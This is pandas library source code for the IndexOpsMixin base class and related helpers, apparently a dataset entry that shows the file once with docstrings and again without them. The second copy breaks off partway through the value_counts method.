raise AbstractMethodError(self)
@property
def ndim(self) -> int:
"""
Number of dimensions of the underlying data, by definition 1.
"""
return 1
def item(self):
"""
Return the first element of the underlying data as a Python scalar.
Returns
-------
scalar
The first element of %(klass)s.
Raises
------
ValueError
If the data is not length-1.
"""
if len(self) == 1:
return next(iter(self))
raise ValueError("can only convert an array of size 1 to a Python scalar")
@property
def nbytes(self) -> int:
"""
Return the number of bytes in the underlying data.
"""
return self._values.nbytes
@property
def size(self) -> int:
"""
Return the number of elements in the underlying data.
"""
return len(self._values)
@property
def array(self) -> ExtensionArray:
"""
The ExtensionArray of the data backing this Series or Index.
Returns
-------
ExtensionArray
An ExtensionArray of the values stored within. For extension
types, this is the actual array. For NumPy native types, this
is a thin (no copy) wrapper around :class:`numpy.ndarray`.
        ``.array`` differs from ``.values``, which may require converting the
data to a different form.
See Also
--------
Index.to_numpy : Similar method that always returns a NumPy array.
Series.to_numpy : Similar method that always returns a NumPy array.
Notes
-----
This table lays out the different array types for each extension
dtype within pandas.
================== =============================
dtype array type
================== =============================
category Categorical
period PeriodArray
interval IntervalArray
IntegerNA IntegerArray
string StringArray
boolean BooleanArray
datetime64[ns, tz] DatetimeArray
================== =============================
For any 3rd-party extension types, the array type will be an
ExtensionArray.
For all remaining dtypes ``.array`` will be a
:class:`arrays.NumpyExtensionArray` wrapping the actual ndarray
stored within. If you absolutely need a NumPy array (possibly with
copying / coercing data), then use :meth:`Series.to_numpy` instead.
Examples
--------
For regular NumPy types like int, and float, a PandasArray
is returned.
>>> pd.Series([1, 2, 3]).array
<PandasArray>
[1, 2, 3]
Length: 3, dtype: int64
For extension types, like Categorical, the actual ExtensionArray
is returned
>>> ser = pd.Series(pd.Categorical(['a', 'b', 'a']))
>>> ser.array
['a', 'b', 'a']
Categories (2, object): ['a', 'b']
"""
raise AbstractMethodError(self)
def to_numpy(
self,
dtype: npt.DTypeLike | None = None,
copy: bool = False,
na_value=lib.no_default,
**kwargs,
) -> np.ndarray:
"""
A NumPy ndarray representing the values in this Series or Index.
Parameters
----------
dtype : str or numpy.dtype, optional
The dtype to pass to :meth:`numpy.asarray`.
copy : bool, default False
Whether to ensure that the returned value is not a view on
another array. Note that ``copy=False`` does not *ensure* that
            ``to_numpy()`` is no-copy. Rather, ``copy=True`` ensures that
a copy is made, even if not strictly necessary.
na_value : Any, optional
The value to use for missing values. The default value depends
on `dtype` and the type of the array.
.. versionadded:: 1.0.0
**kwargs
Additional keywords passed through to the ``to_numpy`` method
of the underlying array (for extension arrays).
.. versionadded:: 1.0.0
Returns
-------
numpy.ndarray
See Also
--------
Series.array : Get the actual data stored within.
Index.array : Get the actual data stored within.
DataFrame.to_numpy : Similar method for DataFrame.
Notes
-----
The returned array will be the same up to equality (values equal
in `self` will be equal in the returned array; likewise for values
that are not equal). When `self` contains an ExtensionArray, the
dtype may be different. For example, for a category-dtype Series,
``to_numpy()`` will return a NumPy array and the categorical dtype
will be lost.
For NumPy dtypes, this will be a reference to the actual data stored
in this Series or Index (assuming ``copy=False``). Modifying the result
in place will modify the data stored in the Series or Index (not that
we recommend doing that).
For extension types, ``to_numpy()`` *may* require copying data and
coercing the result to a NumPy type (possibly object), which may be
expensive. When you need a no-copy reference to the underlying data,
:attr:`Series.array` should be used instead.
This table lays out the different dtypes and default return types of
``to_numpy()`` for various dtypes within pandas.
================== ================================
dtype array type
================== ================================
category[T] ndarray[T] (same dtype as input)
period ndarray[object] (Periods)
interval ndarray[object] (Intervals)
IntegerNA ndarray[object]
datetime64[ns] datetime64[ns]
datetime64[ns, tz] ndarray[object] (Timestamps)
================== ================================
Examples
--------
>>> ser = pd.Series(pd.Categorical(['a', 'b', 'a']))
>>> ser.to_numpy()
array(['a', 'b', 'a'], dtype=object)
Specify the `dtype` to control how datetime-aware data is represented.
Use ``dtype=object`` to return an ndarray of pandas :class:`Timestamp`
objects, each with the correct ``tz``.
>>> ser = pd.Series(pd.date_range('2000', periods=2, tz="CET"))
>>> ser.to_numpy(dtype=object)
array([Timestamp('2000-01-01 00:00:00+0100', tz='CET'),
Timestamp('2000-01-02 00:00:00+0100', tz='CET')],
dtype=object)
Or ``dtype='datetime64[ns]'`` to return an ndarray of native
datetime64 values. The values are converted to UTC and the timezone
info is dropped.
>>> ser.to_numpy(dtype="datetime64[ns]")
... # doctest: +ELLIPSIS
array(['1999-12-31T23:00:00.000000000', '2000-01-01T23:00:00...'],
dtype='datetime64[ns]')
"""
if is_extension_array_dtype(self.dtype):
# error: Too many arguments for "to_numpy" of "ExtensionArray"
return self.array.to_numpy( # type: ignore[call-arg]
dtype, copy=copy, na_value=na_value, **kwargs
)
elif kwargs:
bad_keys = list(kwargs.keys())[0]
raise TypeError(
f"to_numpy() got an unexpected keyword argument '{bad_keys}'"
)
result = np.asarray(self._values, dtype=dtype)
# TODO(GH-24345): Avoid potential double copy
if copy or na_value is not lib.no_default:
result = result.copy()
if na_value is not lib.no_default:
result[self.isna()] = na_value
return result
@property
def empty(self) -> bool:
return not self.size
def max(self, axis=None, skipna: bool = True, *args, **kwargs):
"""
Return the maximum value of the Index.
Parameters
----------
axis : int, optional
For compatibility with NumPy. Only 0 or None are allowed.
skipna : bool, default True
Exclude NA/null values when showing the result.
*args, **kwargs
Additional arguments and keywords for compatibility with NumPy.
Returns
-------
scalar
Maximum value.
See Also
--------
Index.min : Return the minimum value in an Index.
Series.max : Return the maximum value in a Series.
DataFrame.max : Return the maximum values in a DataFrame.
Examples
--------
>>> idx = pd.Index([3, 2, 1])
>>> idx.max()
3
>>> idx = pd.Index(['c', 'b', 'a'])
>>> idx.max()
'c'
For a MultiIndex, the maximum is determined lexicographically.
>>> idx = pd.MultiIndex.from_product([('a', 'b'), (2, 1)])
>>> idx.max()
('b', 2)
"""
nv.validate_minmax_axis(axis)
nv.validate_max(args, kwargs)
return nanops.nanmax(self._values, skipna=skipna)
@doc(op="max", oppose="min", value="largest")
def argmax(self, axis=None, skipna: bool = True, *args, **kwargs) -> int:
"""
Return int position of the {value} value in the Series.
If the {op}imum is achieved in multiple locations,
the first row position is returned.
Parameters
----------
axis : {{None}}
Dummy argument for consistency with Series.
skipna : bool, default True
Exclude NA/null values when showing the result.
*args, **kwargs
Additional arguments and keywords for compatibility with NumPy.
Returns
-------
int
Row position of the {op}imum value.
See Also
--------
Series.arg{op} : Return position of the {op}imum value.
Series.arg{oppose} : Return position of the {oppose}imum value.
numpy.ndarray.arg{op} : Equivalent method for numpy arrays.
Series.idxmax : Return index label of the maximum values.
Series.idxmin : Return index label of the minimum values.
Examples
--------
        Consider a dataset containing cereal calories
>>> s = pd.Series({{'Corn Flakes': 100.0, 'Almond Delight': 110.0,
... 'Cinnamon Toast Crunch': 120.0, 'Cocoa Puff': 110.0}})
>>> s
Corn Flakes 100.0
Almond Delight 110.0
Cinnamon Toast Crunch 120.0
Cocoa Puff 110.0
dtype: float64
>>> s.argmax()
2
>>> s.argmin()
0
        The maximum cereal calories is the third element (position 2) and
        the minimum cereal calories is the first element (position 0),
        since the Series is zero-indexed.
"""
delegate = self._values
nv.validate_minmax_axis(axis)
skipna = nv.validate_argmax_with_skipna(skipna, args, kwargs)
if isinstance(delegate, ExtensionArray):
if not skipna and delegate.isna().any():
return -1
else:
return delegate.argmax()
else:
# error: Incompatible return value type (got "Union[int, ndarray]", expected
# "int")
return nanops.nanargmax( # type: ignore[return-value]
delegate, skipna=skipna
)
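    # Illustrative sketch (not part of pandas): per the ExtensionArray branch
    # above, ``-1`` is returned rather than raising when ``skipna=False`` and
    # NAs are present.
    #
    #   >>> pd.Series([1, None], dtype="Int64").argmax(skipna=False)
    #   -1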
def min(self, axis=None, skipna: bool = True, *args, **kwargs):
"""
Return the minimum value of the Index.
Parameters
----------
axis : {None}
Dummy argument for consistency with Series.
skipna : bool, default True
Exclude NA/null values when showing the result.
*args, **kwargs
Additional arguments and keywords for compatibility with NumPy.
Returns
-------
scalar
Minimum value.
See Also
--------
Index.max : Return the maximum value of the object.
Series.min : Return the minimum value in a Series.
DataFrame.min : Return the minimum values in a DataFrame.
Examples
--------
>>> idx = pd.Index([3, 2, 1])
>>> idx.min()
1
>>> idx = pd.Index(['c', 'b', 'a'])
>>> idx.min()
'a'
For a MultiIndex, the minimum is determined lexicographically.
>>> idx = pd.MultiIndex.from_product([('a', 'b'), (2, 1)])
>>> idx.min()
('a', 1)
"""
nv.validate_minmax_axis(axis)
nv.validate_min(args, kwargs)
return nanops.nanmin(self._values, skipna=skipna)
@doc(argmax, op="min", oppose="max", value="smallest")
def argmin(self, axis=None, skipna=True, *args, **kwargs) -> int:
delegate = self._values
nv.validate_minmax_axis(axis)
skipna = nv.validate_argmin_with_skipna(skipna, args, kwargs)
if isinstance(delegate, ExtensionArray):
if not skipna and delegate.isna().any():
return -1
else:
return delegate.argmin()
else:
# error: Incompatible return value type (got "Union[int, ndarray]", expected
# "int")
return nanops.nanargmin( # type: ignore[return-value]
delegate, skipna=skipna
)
def tolist(self):
"""
Return a list of the values.
These are each a scalar type, which is a Python scalar
(for str, int, float) or a pandas scalar
        (for Timestamp/Timedelta/Interval/Period).
Returns
-------
list
See Also
--------
numpy.ndarray.tolist : Return the array as an a.ndim-levels deep
nested list of Python scalars.
"""
if not isinstance(self._values, np.ndarray):
# check for ndarray instead of dtype to catch DTA/TDA
return list(self._values)
return self._values.tolist()
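    # Illustrative sketch (not part of pandas): datetime data comes back as
    # pandas scalars, not NumPy ones.
    #
    #   >>> pd.Series(pd.to_datetime(["2000-01-01"])).tolist()
    #   [Timestamp('2000-01-01 00:00:00')]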
to_list = tolist
def __iter__(self):
"""
Return an iterator of the values.
These are each a scalar type, which is a Python scalar
(for str, int, float) or a pandas scalar
        (for Timestamp/Timedelta/Interval/Period).
Returns
-------
iterator
"""
# We are explicitly making element iterators.
if not isinstance(self._values, np.ndarray):
# Check type instead of dtype to catch DTA/TDA
return iter(self._values)
else:
return map(self._values.item, range(self._values.size))
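    # Note (sketch, not part of pandas): ``ndarray.item`` is used above so that
    # iteration yields Python scalars (e.g. ``int``) rather than NumPy scalars
    # (e.g. ``np.int64``).
    #
    #   >>> type(next(iter(pd.Series([1, 2]))))
    #   <class 'int'>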
@cache_readonly
def hasnans(self) -> bool:
"""
        Return True if there are any NaNs; this enables various performance speedups.
"""
return bool(isna(self).any())
def isna(self):
return isna(self._values)
def _reduce(
self,
op,
name: str,
*,
axis=0,
skipna=True,
numeric_only=None,
filter_type=None,
**kwds,
):
"""
Perform the reduction type operation if we can.
"""
func = getattr(self, name, None)
if func is None:
raise TypeError(
f"{type(self).__name__} cannot perform the operation {name}"
)
return func(skipna=skipna, **kwds)
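    # Illustrative note (sketch, not part of pandas): the ``op`` argument is
    # unused here; dispatch is purely by ``name``, so for example
    # ``obj._reduce(None, "max")`` ends up calling ``obj.max(skipna=...)``.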
@final
def _map_values(self, mapper, na_action=None):
"""
An internal function that maps values using the input
correspondence (which can be a dict, Series, or function).
Parameters
----------
mapper : function, dict, or Series
The input correspondence object
na_action : {None, 'ignore'}
If 'ignore', propagate NA values, without passing them to the
            mapping function.
Returns
-------
Union[Index, MultiIndex], inferred
The output of the mapping function applied to the index.
            If the function returns a tuple with more than one element,
            a MultiIndex will be returned.
"""
# we can fastpath dict/Series to an efficient map
# as we know that we are not going to have to yield
# python types
if is_dict_like(mapper):
if isinstance(mapper, dict) and hasattr(mapper, "__missing__"):
# If a dictionary subclass defines a default value method,
# convert mapper to a lookup function (GH #15999).
dict_with_default = mapper
mapper = lambda x: dict_with_default[x]
else:
# Dictionary does not have a default. Thus it's safe to
                # convert to a Series for efficiency.
# we specify the keys here to handle the
# possibility that they are tuples
# The return value of mapping with an empty mapper is
# expected to be pd.Series(np.nan, ...). As np.nan is
# of dtype float64 the return value of this method should
# be float64 as well
mapper = create_series_with_explicit_dtype(
mapper, dtype_if_empty=np.float64
)
if isinstance(mapper, ABCSeries):
# Since values were input this means we came from either
# a dict or a series and mapper should be an index
if is_categorical_dtype(self.dtype):
# use the built in categorical series mapper which saves
# time by mapping the categories instead of all values
cat = cast("Categorical", self._values)
return cat.map(mapper)
values = self._values
indexer = mapper.index.get_indexer(values)
new_values = algorithms.take_nd(mapper._values, indexer)
return new_values
# we must convert to python types
if is_extension_array_dtype(self.dtype) and hasattr(self._values, "map"):
# GH#23179 some EAs do not have `map`
values = self._values
if na_action is not None:
raise NotImplementedError
map_f = lambda values, f: values.map(f)
else:
values = self._values.astype(object)
if na_action == "ignore":
map_f = lambda values, f: lib.map_infer_mask(
values, f, isna(values).view(np.uint8)
)
elif na_action is None:
map_f = lib.map_infer
else:
msg = (
"na_action must either be 'ignore' or None, "
f"{na_action} was passed"
)
raise ValueError(msg)
# mapper is a function
new_values = map_f(values, mapper)
return new_values
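    # Illustrative sketch (not part of pandas): the public ``Series.map``
    # funnels into ``_map_values``; with ``na_action="ignore"`` the mapper is
    # never called on missing values.
    #
    #   >>> pd.Series(["cat", np.nan]).map("I am a {}".format, na_action="ignore")
    #   0    I am a cat
    #   1           NaN
    #   dtype: object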
def value_counts(
self,
normalize: bool = False,
sort: bool = True,
ascending: bool = False,
bins=None,
dropna: bool = True,
):
"""
Return a Series containing counts of unique values.
The resulting object will be in descending order so that the
first element is the most frequently-occurring element.
Excludes NA values by default.
Parameters
----------
normalize : bool, default False
If True then the object returned will contain the relative
frequencies of the unique values.
sort : bool, default True
Sort by frequencies.
ascending : bool, default False
Sort in ascending order.
bins : int, optional
Rather than count values, group them into half-open bins,
a convenience for ``pd.cut``, only works with numeric data.
dropna : bool, default True
Don't include counts of NaN.
Returns
-------
Series
See Also
--------
Series.count: Number of non-NA elements in a Series.
DataFrame.count: Number of non-NA elements in a DataFrame.
DataFrame.value_counts: Equivalent method on DataFrames.
Examples
--------
>>> index = pd.Index([3, 1, 2, 3, 4, np.nan])
>>> index.value_counts()
3.0 2
1.0 1
2.0 1
4.0 1
dtype: int64
With `normalize` set to `True`, returns the relative frequency by
dividing all values by the sum of values.
>>> s = pd.Series([3, 1, 2, 3, 4, np.nan])
>>> s.value_counts(normalize=True)
3.0 0.4
1.0 0.2
2.0 0.2
4.0 0.2
dtype: float64
**bins**
Bins can be useful for going from a continuous variable to a
categorical variable; instead of counting unique
        occurrences of values, divide the index into the specified
number of half-open bins.
>>> s.value_counts(bins=3)
(0.996, 2.0] 2
(2.0, 3.0] 2
(3.0, 4.0] 1
dtype: int64
**dropna**
With `dropna` set to `False` we can also see NaN index values.
>>> s.value_counts(dropna=False)
3.0 2
1.0 1
2.0 1
4.0 1
NaN 1
dtype: int64
"""
return value_counts(
self,
sort=sort,
ascending=ascending,
normalize=normalize,
bins=bins,
dropna=dropna,
)
def unique(self):
values = self._values
if not isinstance(values, np.ndarray):
result: ArrayLike = values.unique()
if self.dtype.kind in ["m", "M"] and isinstance(self, ABCSeries):
# GH#31182 Series._values returns EA, unpack for backward-compat
if getattr(self.dtype, "tz", None) is None:
result = np.asarray(result)
else:
result = unique1d(values)
return result
def nunique(self, dropna: bool = True) -> int:
"""
Return number of unique elements in the object.
Excludes NA values by default.
Parameters
----------
dropna : bool, default True
Don't include NaN in the count.
Returns
-------
int
See Also
--------
DataFrame.nunique: Method nunique for DataFrame.
Series.count: Count non-NA/null observations in the Series.
Examples
--------
>>> s = pd.Series([1, 3, 5, 7, 7])
>>> s
0 1
1 3
2 5
3 7
4 7
dtype: int64
>>> s.nunique()
4
"""
uniqs = self.unique()
if dropna:
uniqs = remove_na_arraylike(uniqs)
return len(uniqs)
@property
def is_unique(self) -> bool:
"""
        Return True if all values in the object are unique.
Returns
-------
bool
"""
return self.nunique(dropna=False) == len(self)
@property
def is_monotonic(self) -> bool:
"""
        Return True if values in the object are monotonically increasing.
Returns
-------
bool
"""
from pandas import Index
return Index(self).is_monotonic
@property
def is_monotonic_increasing(self) -> bool:
"""
Alias for is_monotonic.
"""
# mypy complains if we alias directly
return self.is_monotonic
@property
def is_monotonic_decreasing(self) -> bool:
"""
        Return True if values in the object are monotonically decreasing.
Returns
-------
bool
"""
from pandas import Index
return Index(self).is_monotonic_decreasing
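    # Illustrative sketch (not part of pandas): monotonicity checks are
    # non-strict and are delegated to an Index built over the values.
    #
    #   >>> pd.Series([1, 2, 2]).is_monotonic_increasing
    #   True
    #   >>> pd.Series([3, 2]).is_monotonic_decreasing
    #   True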
def _memory_usage(self, deep: bool = False) -> int:
"""
Memory usage of the values.
Parameters
----------
deep : bool, default False
Introspect the data deeply, interrogate
`object` dtypes for system-level memory consumption.
Returns
-------
bytes used
See Also
--------
numpy.ndarray.nbytes : Total bytes consumed by the elements of the
array.
Notes
-----
Memory usage does not include memory consumed by elements that
        are not components of the array if deep=False or if used on PyPy.
"""
if hasattr(self.array, "memory_usage"):
# https://github.com/python/mypy/issues/1424
# error: "ExtensionArray" has no attribute "memory_usage"
return self.array.memory_usage(deep=deep) # type: ignore[attr-defined]
v = self.array.nbytes
if deep and is_object_dtype(self) and not PYPY:
values = cast(np.ndarray, self._values)
v += lib.memory_usage_of_objects(values)
return v
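    # Illustrative sketch (not part of pandas): ``deep=True`` only differs for
    # ``object`` dtype, where the per-element Python payload is added.
    #
    #   >>> s = pd.Series(["ab", "cd"])
    #   >>> s.memory_usage(deep=True) >= s.memory_usage()
    #   True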
@doc(
algorithms.factorize,
values="",
order="",
size_hint="",
sort=textwrap.dedent(
"""\
sort : bool, default False
Sort `uniques` and shuffle `codes` to maintain the
relationship.
"""
),
)
def factorize(self, sort: bool = False, na_sentinel: int | None = -1):
return algorithms.factorize(self, sort=sort, na_sentinel=na_sentinel)
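    # Illustrative sketch (not part of pandas): ``sort=True`` reorders
    # `uniques` and remaps `codes` accordingly.
    #
    #   >>> codes, uniques = pd.Series(["b", "a", "b"]).factorize(sort=True)
    #   >>> codes
    #   array([1, 0, 1])
    #   >>> uniques
    #   Index(['a', 'b'], dtype='object')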
_shared_docs[
"searchsorted"
] = """
Find indices where elements should be inserted to maintain order.
Find the indices into a sorted {klass} `self` such that, if the
corresponding elements in `value` were inserted before the indices,
the order of `self` would be preserved.
.. note::
The {klass} *must* be monotonically sorted, otherwise
wrong locations will likely be returned. Pandas does *not*
check this for you.
Parameters
----------
value : array-like or scalar
Values to insert into `self`.
side : {{'left', 'right'}}, optional
If 'left', the index of the first suitable location found is given.
If 'right', return the last such index. If there is no suitable
index, return either 0 or N (where N is the length of `self`).
sorter : 1-D array-like, optional
Optional array of integer indices that sort `self` into ascending
order. They are typically the result of ``np.argsort``.
Returns
-------
int or array of int
A scalar or array of insertion points with the
same shape as `value`.
See Also
--------
sort_values : Sort by the values along either axis.
numpy.searchsorted : Similar method from NumPy.
Notes
-----
Binary search is used to find the required insertion points.
Examples
--------
>>> ser = pd.Series([1, 2, 3])
>>> ser
0 1
1 2
2 3
dtype: int64
>>> ser.searchsorted(4)
3
>>> ser.searchsorted([0, 4])
array([0, 3])
>>> ser.searchsorted([1, 3], side='left')
array([0, 2])
>>> ser.searchsorted([1, 3], side='right')
array([1, 3])
>>> ser = pd.Series(pd.to_datetime(['3/11/2000', '3/12/2000', '3/13/2000']))
>>> ser
0 2000-03-11
1 2000-03-12
2 2000-03-13
dtype: datetime64[ns]
>>> ser.searchsorted('3/14/2000')
3
>>> ser = pd.Categorical(
... ['apple', 'bread', 'bread', 'cheese', 'milk'], ordered=True
... )
>>> ser
['apple', 'bread', 'bread', 'cheese', 'milk']
Categories (4, object): ['apple' < 'bread' < 'cheese' < 'milk']
>>> ser.searchsorted('bread')
1
>>> ser.searchsorted(['bread'], side='right')
array([3])
If the values are not monotonically sorted, wrong locations
may be returned:
>>> ser = pd.Series([2, 1, 3])
>>> ser
0 2
1 1
2 3
dtype: int64
>>> ser.searchsorted(1) # doctest: +SKIP
0 # wrong result, correct would be 1
"""
@doc(_shared_docs["searchsorted"], klass="Index")
def searchsorted(
self,
value: NumpyValueArrayLike,
side: Literal["left", "right"] = "left",
sorter: NumpySorter = None,
) -> npt.NDArray[np.intp] | np.intp:
return algorithms.searchsorted(self._values, value, side=side, sorter=sorter)
def drop_duplicates(self, keep="first"):
duplicated = self._duplicated(keep=keep)
# error: Value of type "IndexOpsMixin" is not indexable
return self[~duplicated] # type: ignore[index]
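    # Illustrative sketch (not part of pandas): ``keep`` selects which of the
    # duplicates survives.
    #
    #   >>> pd.Series([1, 1, 2]).drop_duplicates(keep="last")
    #   1    1
    #   2    2
    #   dtype: int64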
@final
def _duplicated(
self, keep: Literal["first", "last", False] = "first"
) -> npt.NDArray[np.bool_]:
return duplicated(self._values, keep=keep)
def _arith_method(self, other, op):
res_name = ops.get_op_result_name(self, other)
lvalues = self._values
rvalues = extract_array(other, extract_numpy=True, extract_range=True)
rvalues = ops.maybe_prepare_scalar_for_op(rvalues, lvalues.shape)
rvalues = ensure_wrapped_if_datetimelike(rvalues)
with np.errstate(all="ignore"):
result = ops.arithmetic_op(lvalues, rvalues, op)
return self._construct_result(result, name=res_name)
def _construct_result(self, result, name):
"""
Construct an appropriately-wrapped result from the ArrayLike result
of an arithmetic-like operation.
"""
raise AbstractMethodError(self)
| 30.338836
| 88
| 0.560208
|
from __future__ import annotations
import textwrap
from typing import (
TYPE_CHECKING,
Any,
Generic,
Hashable,
Literal,
TypeVar,
cast,
final,
)
import numpy as np
import pandas._libs.lib as lib
from pandas._typing import (
ArrayLike,
DtypeObj,
FrameOrSeries,
IndexLabel,
Shape,
npt,
)
from pandas.compat import PYPY
from pandas.compat.numpy import function as nv
from pandas.errors import AbstractMethodError
from pandas.util._decorators import (
cache_readonly,
doc,
)
from pandas.core.dtypes.common import (
is_categorical_dtype,
is_dict_like,
is_extension_array_dtype,
is_object_dtype,
is_scalar,
)
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCIndex,
ABCSeries,
)
from pandas.core.dtypes.missing import (
isna,
remove_na_arraylike,
)
from pandas.core import (
algorithms,
ops,
)
from pandas.core.accessor import DirNamesMixin
from pandas.core.algorithms import (
duplicated,
unique1d,
value_counts,
)
from pandas.core.arraylike import OpsMixin
from pandas.core.arrays import ExtensionArray
from pandas.core.construction import (
create_series_with_explicit_dtype,
ensure_wrapped_if_datetimelike,
extract_array,
)
import pandas.core.nanops as nanops
if TYPE_CHECKING:
from pandas._typing import (
NumpySorter,
NumpyValueArrayLike,
)
from pandas import Categorical
_shared_docs: dict[str, str] = {}
_indexops_doc_kwargs = {
"klass": "IndexOpsMixin",
"inplace": "",
"unique": "IndexOpsMixin",
"duplicated": "IndexOpsMixin",
}
_T = TypeVar("_T", bound="IndexOpsMixin")
class PandasObject(DirNamesMixin):
_cache: dict[str, Any]
@property
def _constructor(self):
return type(self)
def __repr__(self) -> str:
return object.__repr__(self)
def _reset_cache(self, key: str | None = None) -> None:
if not hasattr(self, "_cache"):
return
if key is None:
self._cache.clear()
else:
self._cache.pop(key, None)
def __sizeof__(self) -> int:
memory_usage = getattr(self, "memory_usage", None)
if memory_usage:
mem = memory_usage(deep=True)
return int(mem if is_scalar(mem) else mem.sum())
return super().__sizeof__()
class NoNewAttributesMixin:
def _freeze(self):
object.__setattr__(self, "__frozen", True)
# prevent adding any attribute via s.xxx.new_attribute = ...
def __setattr__(self, key: str, value):
# _cache is used by a decorator
# We need to check both 1.) cls.__dict__ and 2.) getattr(self, key)
# because
# 1.) getattr is false for attributes that raise errors
# 2.) cls.__dict__ doesn't traverse into base classes
if getattr(self, "__frozen", False) and not (
key == "_cache"
or key in type(self).__dict__
or getattr(self, key, None) is not None
):
raise AttributeError(f"You cannot add any new attribute '{key}'")
object.__setattr__(self, key, value)
class DataError(Exception):
pass
class SpecificationError(Exception):
pass
class SelectionMixin(Generic[FrameOrSeries]):
obj: FrameOrSeries
_selection: IndexLabel | None = None
exclusions: frozenset[Hashable]
_internal_names = ["_cache", "__setstate__"]
_internal_names_set = set(_internal_names)
@final
@property
def _selection_list(self):
if not isinstance(
self._selection, (list, tuple, ABCSeries, ABCIndex, np.ndarray)
):
return [self._selection]
return self._selection
@cache_readonly
def _selected_obj(self):
if self._selection is None or isinstance(self.obj, ABCSeries):
return self.obj
else:
return self.obj[self._selection]
@final
@cache_readonly
def ndim(self) -> int:
return self._selected_obj.ndim
@final
@cache_readonly
def _obj_with_exclusions(self):
if self._selection is not None and isinstance(self.obj, ABCDataFrame):
return self.obj[self._selection_list]
if len(self.exclusions) > 0:
return self.obj._drop_axis(
self.exclusions, axis=1, consolidate=False, only_slice=True
)
else:
return self.obj
def __getitem__(self, key):
if self._selection is not None:
raise IndexError(f"Column(s) {self._selection} already selected")
if isinstance(key, (list, tuple, ABCSeries, ABCIndex, np.ndarray)):
if len(self.obj.columns.intersection(key)) != len(key):
bad_keys = list(set(key).difference(self.obj.columns))
raise KeyError(f"Columns not found: {str(bad_keys)[1:-1]}")
return self._gotitem(list(key), ndim=2)
elif not getattr(self, "as_index", False):
if key not in self.obj.columns:
raise KeyError(f"Column not found: {key}")
return self._gotitem(key, ndim=2)
else:
if key not in self.obj:
raise KeyError(f"Column not found: {key}")
subset = self.obj[key]
ndim = subset.ndim
return self._gotitem(key, ndim=ndim, subset=subset)
def _gotitem(self, key, ndim: int, subset=None):
raise AbstractMethodError(self)
def aggregate(self, func, *args, **kwargs):
raise AbstractMethodError(self)
agg = aggregate
class IndexOpsMixin(OpsMixin):
__array_priority__ = 1000
_hidden_attrs: frozenset[str] = frozenset(
["tolist"]
)
@property
def dtype(self) -> DtypeObj:
raise AbstractMethodError(self)
@property
def _values(self) -> ExtensionArray | np.ndarray:
raise AbstractMethodError(self)
def transpose(self: _T, *args, **kwargs) -> _T:
nv.validate_transpose(args, kwargs)
return self
T = property(
transpose,
doc="""
Return the transpose, which is by definition self.
""",
)
@property
def shape(self) -> Shape:
return self._values.shape
def __len__(self) -> int:
raise AbstractMethodError(self)
@property
def ndim(self) -> int:
return 1
def item(self):
if len(self) == 1:
return next(iter(self))
raise ValueError("can only convert an array of size 1 to a Python scalar")
@property
def nbytes(self) -> int:
return self._values.nbytes
@property
def size(self) -> int:
return len(self._values)
@property
def array(self) -> ExtensionArray:
raise AbstractMethodError(self)
def to_numpy(
self,
dtype: npt.DTypeLike | None = None,
copy: bool = False,
na_value=lib.no_default,
**kwargs,
) -> np.ndarray:
if is_extension_array_dtype(self.dtype):
return self.array.to_numpy(
dtype, copy=copy, na_value=na_value, **kwargs
)
elif kwargs:
bad_keys = list(kwargs.keys())[0]
raise TypeError(
f"to_numpy() got an unexpected keyword argument '{bad_keys}'"
)
result = np.asarray(self._values, dtype=dtype)
if copy or na_value is not lib.no_default:
result = result.copy()
if na_value is not lib.no_default:
result[self.isna()] = na_value
return result
@property
def empty(self) -> bool:
return not self.size
def max(self, axis=None, skipna: bool = True, *args, **kwargs):
nv.validate_minmax_axis(axis)
nv.validate_max(args, kwargs)
return nanops.nanmax(self._values, skipna=skipna)
@doc(op="max", oppose="min", value="largest")
def argmax(self, axis=None, skipna: bool = True, *args, **kwargs) -> int:
delegate = self._values
nv.validate_minmax_axis(axis)
skipna = nv.validate_argmax_with_skipna(skipna, args, kwargs)
if isinstance(delegate, ExtensionArray):
if not skipna and delegate.isna().any():
return -1
else:
return delegate.argmax()
else:
return nanops.nanargmax(
delegate, skipna=skipna
)
def min(self, axis=None, skipna: bool = True, *args, **kwargs):
nv.validate_minmax_axis(axis)
nv.validate_min(args, kwargs)
return nanops.nanmin(self._values, skipna=skipna)
@doc(argmax, op="min", oppose="max", value="smallest")
def argmin(self, axis=None, skipna=True, *args, **kwargs) -> int:
delegate = self._values
nv.validate_minmax_axis(axis)
skipna = nv.validate_argmin_with_skipna(skipna, args, kwargs)
if isinstance(delegate, ExtensionArray):
if not skipna and delegate.isna().any():
return -1
else:
return delegate.argmin()
else:
return nanops.nanargmin(
delegate, skipna=skipna
)
def tolist(self):
if not isinstance(self._values, np.ndarray):
return list(self._values)
return self._values.tolist()
to_list = tolist
def __iter__(self):
if not isinstance(self._values, np.ndarray):
return iter(self._values)
else:
return map(self._values.item, range(self._values.size))
@cache_readonly
def hasnans(self) -> bool:
return bool(isna(self).any())
def isna(self):
return isna(self._values)
def _reduce(
self,
op,
name: str,
*,
axis=0,
skipna=True,
numeric_only=None,
filter_type=None,
**kwds,
):
func = getattr(self, name, None)
if func is None:
raise TypeError(
f"{type(self).__name__} cannot perform the operation {name}"
)
return func(skipna=skipna, **kwds)
@final
def _map_values(self, mapper, na_action=None):
if is_dict_like(mapper):
if isinstance(mapper, dict) and hasattr(mapper, "__missing__"):
dict_with_default = mapper
mapper = lambda x: dict_with_default[x]
else:
                # convert to a Series for efficiency.
# we specify the keys here to handle the
# possibility that they are tuples
# The return value of mapping with an empty mapper is
# expected to be pd.Series(np.nan, ...). As np.nan is
# of dtype float64 the return value of this method should
# be float64 as well
mapper = create_series_with_explicit_dtype(
mapper, dtype_if_empty=np.float64
)
if isinstance(mapper, ABCSeries):
# Since values were input this means we came from either
# a dict or a series and mapper should be an index
if is_categorical_dtype(self.dtype):
# use the built in categorical series mapper which saves
# time by mapping the categories instead of all values
cat = cast("Categorical", self._values)
return cat.map(mapper)
values = self._values
indexer = mapper.index.get_indexer(values)
new_values = algorithms.take_nd(mapper._values, indexer)
return new_values
# we must convert to python types
if is_extension_array_dtype(self.dtype) and hasattr(self._values, "map"):
# GH#23179 some EAs do not have `map`
values = self._values
if na_action is not None:
raise NotImplementedError
map_f = lambda values, f: values.map(f)
else:
values = self._values.astype(object)
if na_action == "ignore":
map_f = lambda values, f: lib.map_infer_mask(
values, f, isna(values).view(np.uint8)
)
elif na_action is None:
map_f = lib.map_infer
else:
msg = (
"na_action must either be 'ignore' or None, "
f"{na_action} was passed"
)
raise ValueError(msg)
# mapper is a function
new_values = map_f(values, mapper)
return new_values
def value_counts(
self,
normalize: bool = False,
sort: bool = True,
